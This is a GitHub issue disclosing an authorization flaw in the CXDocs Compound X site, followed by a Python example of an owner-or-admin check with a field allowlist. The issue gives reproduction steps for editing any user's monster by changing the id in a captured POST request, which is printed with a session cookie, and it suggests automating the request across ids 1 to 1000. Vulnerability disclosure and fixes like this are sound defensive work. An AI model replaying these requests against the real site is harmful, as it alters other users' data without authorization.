bleehu / CXDocs

Compound X rules displayed as web pages. Written in Python, served with Flask and bootstrapped with bootswatch.

Bug allows for rewriting of arbitrary monster's data fields #266

Open Turtlelord26 opened 4 years ago

Turtlelord26 commented 4 years ago

Impact: Any user with a valid session cookie can rewrite the data fields of any monster in the database, regardless of ownership or privacy settings.

Steps to Reproduce:

  1. Navigate to https://www.compoundx.org and log in with a valid username and password.
  2. Navigate to https://www.compoundx.org/monstereditor
  3. Fill in required fields, then capture the packet generated by clicking the "Submit to DB" button (shown below)
  4. Change the monster id (91 in the example packet) to an arbitrary number, or a particular one if you happen to have a particular enemy in mind and know its id.
  5. Make arbitrary changes to data fields, such as name, description, privacy, etc., then submit the packet.
  6. Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass changes to all monsters.

POST /updateMonster/91 HTTP/1.1
Host: www.compoundx.org
Connection: close
Content-Length: 324
Cache-Control: max-age=0
Origin: https://www.compoundx.org
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://www.compoundx.org/monsterupdate/91
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESt2kQ.aPVNJtVkemmSxGB4I8usqrgEK90

strength=5&perception=5&fortitude=5&charisma=5&intelligence=5&dexterity=5&luck=5&name=hi+it%27s+me&level=1&role=Infantry&health=90&.nanites=90&shock=5&will=5&reflex=5&awareness=5&description="A+turtle+has+been+here...+and+here...+and+here..."&private=f

Recommended fix: Adding in permissions that disallow (non-admin) users from updating monsters that they did not make would prevent a bad actor with a single (non-admin) cookie from updating monsters owned by other users.
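The owner-or-admin check recommended above, as an added example in plain Python (this is not the CXDocs project's code). It models what the handler behind POST /updateMonster/&lt;id&gt; has to do before touching the row: resolve the monster from the database, compare its owner to the session's user, and only then write fields, and only fields from an allowlist, so that keys like the owner or id can never be set from the form body. Flask is deliberately not imported so the block runs offline; the User and Monster shapes, the function names, and the in-memory DB are assumptions about the application, not its real schema.

```python
"""Server-side authorization for a monster-update endpoint (added example).

Models the fix suggested in the issue: authorize against the database row's
owner (or an admin flag on the session user) before any write, and accept
only allowlisted fields from the form. Names and data shapes are assumptions;
the database is a constructed in-memory stand-in.
"""
from dataclasses import dataclass, field
from typing import Dict

# Allowlist of form keys an owner may change, taken from the field names in
# the captured request. 'owner' and 'id' are intentionally absent: they are
# never accepted from the client.
EDITABLE_FIELDS = frozenset({
    "name", "description", "private", "level", "role", "health",
    "strength", "perception", "fortitude", "charisma", "intelligence",
    "dexterity", "luck", "shock", "will", "reflex", "awareness",
})


@dataclass
class User:
    """What the server derives from a valid session cookie (assumed shape)."""
    username: str
    is_admin: bool = False


@dataclass
class Monster:
    """One row of the monster table (assumed shape)."""
    id: int
    owner: str
    data: Dict[str, str] = field(default_factory=dict)


class NotFound(Exception):
    """Monster id does not exist; the real handler would answer HTTP 404."""


class Forbidden(Exception):
    """Session user may not modify this monster; the real handler would answer 403."""


# Constructed stand-in for the database.
DB: Dict[int, Monster] = {
    91: Monster(91, "alice", {"name": "Grunt", "private": "f"}),
    92: Monster(92, "bob", {"name": "Sentinel", "private": "t"}),
}


def authorize_update(user: User, monster_id: int) -> Monster:
    """Resolve the monster and enforce owner-or-admin before any write.

    The id comes from the URL and is fully client-controlled; ownership is
    read from the stored row, never from the request.
    """
    monster = DB.get(monster_id)
    if monster is None:
        raise NotFound(monster_id)
    if not user.is_admin and monster.owner != user.username:
        raise Forbidden(f"{user.username} does not own monster {monster_id}")
    return monster


def update_monster(user: User, monster_id: int, form: Dict[str, str]) -> Monster:
    """Hardened handler body: authorize first, then write only allowlisted keys."""
    monster = authorize_update(user, monster_id)
    # Intersecting with the allowlist silently drops unknown or privileged
    # keys such as 'owner' or 'id' instead of writing them.
    for key in EDITABLE_FIELDS & set(form):
        monster.data[key] = form[key]
    return monster


if __name__ == "__main__":
    # Owner edits her own monster; a stranger is refused; an admin may edit any.
    print(update_monster(User("alice"), 91, {"name": "Brute"}))
    try:
        update_monster(User("carol"), 91, {"name": "taken over"})
    except Forbidden as exc:
        print("refused:", exc)
    print(update_monster(User("mod", is_admin=True), 92, {"private": "f"}))
```

In a Flask view the same two steps sit at the top of the route: load the current user from the signed session, call the ownership check, and return 403 (or 404 for private monsters, if the site would rather not confirm that an id exists) before any UPDATE statement runs. The allowlist is the second half of the fix: even an authorized owner should not be able to reassign ownership through an extra form key.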